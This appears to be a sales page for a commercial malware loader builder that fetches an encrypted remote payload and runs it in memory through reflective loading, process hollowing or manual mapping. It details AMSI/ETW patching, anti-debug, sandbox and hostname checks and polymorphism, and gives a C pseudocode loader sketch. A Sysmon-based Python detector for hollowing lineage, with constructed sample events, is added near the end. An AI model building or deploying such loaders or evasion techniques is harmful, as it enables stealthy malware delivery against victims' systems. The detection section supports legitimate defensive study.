The EXE Launcher produces a native Windows executable whose only job is to fetch a remote PE payload (your real implant or tool) over HTTPS and run it without writing it to disk. The decrypted image still exists in memory, which is where modern EDR memory scans look, so "fileless" here means no on-disk artifact, not no artifact. Three loader strategies are available: reflective PE loading in the launcher's own process, process hollowing into a benign suspended child (e.g., svchost.exe), or manual mapping with custom IAT and relocation handling.
1. Payload host: HTTPS endpoint serving your encrypted PE payload.
2. Load strategy: reflective load, process hollowing target, or manual map.
3. Evasion: AMSI patching, ETW patching, sleep encryption, anti-debug, hostname filter.
4. Output: x86 or x64 native PE with custom icon and metadata.
**Reflective PE load.** Allocates RWX (or RW then RX) memory, copies sections per the PE headers, applies base relocations, resolves the import table, runs TLS callbacks, then jumps to the entrypoint, all inside the launcher's own process. The payload therefore inherits the launcher's PID, image path and parent.

**Process hollowing.** Spawns a benign child (svchost.exe, RegAsm.exe, notepad.exe) suspended, unmaps its original image, writes the payload sections into the child, sets the thread context so execution starts at the payload entrypoint, and resumes the thread. The payload runs inside a process whose image name and path look legitimate; its parent, however, is still the launcher, which is exactly what parent-child lineage rules key on.

**Manual map.** The same section copy, relocation and import resolution as the reflective load, but performed into a remote process and without any LoadLibrary call, so the image is never registered with the Windows loader and does not appear in the target's PEB module lists. Used when the payload is a DLL rather than an EXE.

**AMSI/ETW patch.** Optional in-process patches against AmsiScanBuffer and EtwEventWrite so those telemetry surfaces return without reporting for the loaded payload. These are user-mode patches: they affect only what the patched process itself would report, not kernel-side ETW providers or callbacks.

**Payload encryption.** A per-build symmetric key (AES-128 or AES-256) decrypts the fetched payload. The payload URL is XOR-encoded in the binary and decoded at runtime. Caveat: both the XOR key and the AES key ship inside the launcher, so anyone holding the launcher binary can recover the URL and decrypt a captured payload; the encryption defeats in-transit and at-rest signature scanning, not analysis.

**Polymorphism.** Junk imports, randomized opaque control flow, per-build string XOR keys, section name shuffling, and PE checksum recomputation. No two builds share a file hash.
```c
/* Build sketch exactly as the page presents it: pseudocode, the helper
   functions and the payload length `len` are not defined here. */
int main(void)
{
    if (IsSandbox())                        /* anti-analysis and hostname filter */
        return 0;
    PatchAMSI();                            /* optional user-mode AMSI patch */
    PatchETW();                             /* optional user-mode ETW patch */
    BYTE *buf = Fetch(Dec(URL_ENC, KEY));   /* decode the XOR'd URL, fetch over HTTPS */
    AesDecrypt(buf, len, KEY);              /* per-build AES key */
    ReflectiveLoad(buf);                    /* jumps to payload OEP */
    return 0;
}
```
| Output Format | Native Windows PE (.exe) |
|---|---|
| Delivery Mode | URL only — payload fetched over HTTPS at runtime. No local-embed mode. |
| Architectures | x86 · x64 |
| OS Compatibility | Windows 7 / 8.1 / 10 / 11 |
| Load Strategies | Reflective PE · Process Hollowing · Manual Mapping |
| Hollow Targets | svchost.exe · RegAsm.exe · notepad.exe · msbuild.exe |
| Evasion | AMSI patch · ETW patch · Sleep encryption · Anti-debug · Hostname filter |
| Networking | HTTPS fetch · Per-build AES key · Optional TLS pinning |
| Polymorphism | Imports · Control flow · String XOR · Section names · Checksum |
| Visual Spoof | Custom icon & version-info; common-app cloning options |
- Test reflective load, hollowing, and AMSI/ETW patching telemetry across modern EDR products.
- Use as a tiny first stage that fetches the larger implant only when targeting succeeds (the hostname filter passes).
- Measure how different sandboxes handle anti-analysis primitives, sleep encryption, and hostname filters.
- Benchmark reflective vs. hollowing vs. manual-map performance and detection against the same target.
- Study real loader internals so detections match real-world adversary tradecraft.
- Drop it from any of the Exploit Builder builders (LNK, MSC, CPL, CHM, Macro) as the final native-code stage.
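A detection-side counterpart to the use cases above, added here as an example (it is not the launcher's code and not a shipped rule set): it triages Sysmon-style process-create (EventID 1) and network-connect (EventID 3) events for the lineage signals hollowing leaves behind, namely a hollow target whose parent is not its usual one, a hollow target spawned by a parent running from a user-writable path, and a no-network image (notepad.exe) opening a connection. The event field names follow Sysmon; the parent baselines, the user-writable path markers and the sample events are constructed assumptions for this example.

```python
"""Hollowing triage over Sysmon-style events (constructed sample data).

Added example, not the launcher's code. Field names follow Sysmon's
process-create (EventID 1) and network-connect (EventID 3) events; the
baselines below are assumptions for this example, not a vendor rule set.
"""
import json
import ntpath

# Images the page lists as hollowing targets.
HOLLOW_TARGETS = {"svchost.exe", "regasm.exe", "notepad.exe", "msbuild.exe"}

# Assumed baselines: svchost.exe is normally a child of services.exe,
# and notepad.exe has no business opening network connections.
EXPECTED_PARENT = {"svchost.exe": {"services.exe"}}
NO_NETWORK = {"notepad.exe"}

# A hollowed child's parent is the launcher itself, which is typically
# running from a user-writable directory rather than System32 (assumption).
USER_WRITABLE = ("\\users\\", "\\temp\\", "\\appdata\\", "\\programdata\\")


def image_name(path):
    """Lower-cased file name of a Windows path (works on any host OS)."""
    return ntpath.basename(path).lower()


def check_event(ev):
    """Return (rule, ProcessId) findings for one event dict; [] if clean."""
    findings = []
    eid = ev.get("EventID")
    image = image_name(ev.get("Image", ""))
    pid = ev.get("ProcessId")
    if eid == 1 and image in HOLLOW_TARGETS:
        parent = ev.get("ParentImage", "")
        if image in EXPECTED_PARENT and image_name(parent) not in EXPECTED_PARENT[image]:
            findings.append(("unexpected_parent", pid))
        if any(marker in parent.lower() for marker in USER_WRITABLE):
            findings.append(("parent_in_user_writable_path", pid))
    if eid == 3 and image in NO_NETWORK:
        findings.append(("network_from_non_network_image", pid))
    return findings


def triage(lines):
    """Run check_event over newline-delimited JSON event lines."""
    findings = []
    for line in lines:
        if line.strip():
            findings.extend(check_event(json.loads(line)))
    return findings


# Constructed sample log: a clean svchost, a svchost spawned by a download,
# a notepad that later talks to the network, and RegAsm spawned from %TEMP%.
SAMPLE_EVENTS = [
    {"EventID": 1, "ProcessId": 4120, "Image": r"C:\Windows\System32\svchost.exe",
     "ParentImage": r"C:\Windows\System32\services.exe"},
    {"EventID": 1, "ProcessId": 5208, "Image": r"C:\Windows\System32\svchost.exe",
     "ParentImage": r"C:\Users\alice\Downloads\invoice.exe"},
    {"EventID": 1, "ProcessId": 6004, "Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"EventID": 3, "ProcessId": 6004, "Image": r"C:\Windows\System32\notepad.exe",
     "DestinationIp": "203.0.113.10", "DestinationPort": 443},
    {"EventID": 1, "ProcessId": 7320,
     "Image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe",
     "ParentImage": r"C:\Users\alice\AppData\Local\Temp\launcher.exe"},
]
SAMPLE_LOG = "\n".join(json.dumps(e) for e in SAMPLE_EVENTS)

if __name__ == "__main__":
    for rule, pid in triage(SAMPLE_LOG.splitlines()):
        print(f"{rule}: pid {pid}")
```

Run against the page's own target list, the hollowed svchost.exe and RegAsm.exe are flagged on lineage alone, before the payload does anything: hollowing buys a benign image name, not a benign parent. Tune `EXPECTED_PARENT` and `USER_WRITABLE` to the host baseline before using this outside a lab; the svchost rule in particular assumes a standard services.exe parent.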
All tiers include unlimited builds (x86 and x64), every load strategy, full polymorphism and evasion, and updates within the term.
Bundle option: need multiple builders? The All Modules Bundle covers every builder plus both launchers at a steep discount.
Pick a tier above or talk to us — we'll match the right configuration to your engagement.